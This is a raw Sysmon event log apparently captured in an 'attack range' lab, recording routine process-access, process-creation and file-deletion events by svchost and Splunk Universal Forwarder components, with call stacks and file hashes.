10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.040{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79B61AE7807ECBAC241DFD2CA29F6DEA,SHA256=A366E5A5566429DCF8F91BD792AC3EDC2CF7DD89DC9B0D1E3FD092A9F20BBBFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:01.562{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9538B4B800F1D0BDE2DD41C6F4D0120,SHA256=3DE1FB2B9FC7A9821286A930397181FD7DBDAA8C436D2F03431E8DA09399AE8B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:01.424{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1285-6216-3A05-000000003802}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:01.409{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:01.409{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:01.409{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:01.409{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:01.409{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1285-6216-3A05-000000003802}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:01.409{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1285-6216-3A05-000000003802}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:01.410{C8EA50B7-1285-6216-3A05-000000003802}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217412Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:01.211{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A37C0732DD01193838E3F4A2833E7EEF,SHA256=5FD2A1837A71CAF41734410BF8415948B1FCAF3A7E3D59D93A48F246DDE1376C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217413Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:02.399{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FCB489FFCA413E3C4073A394F66ACB4,SHA256=7BAC3E9A9FF63C706B2156C6F237C34E3A54FABE5E9447677B4EFA890A8F29B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:02.426{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC31B1CFD4CF3573973A30825FB0FB10,SHA256=C721B09A17704371465B1FE258322F4EE528073D9CC146DF78E83045ED562897,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:02.410{C8EA50B7-1286-6216-3B05-000000003802}61123860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:02.042{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1286-6216-3B05-000000003802}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 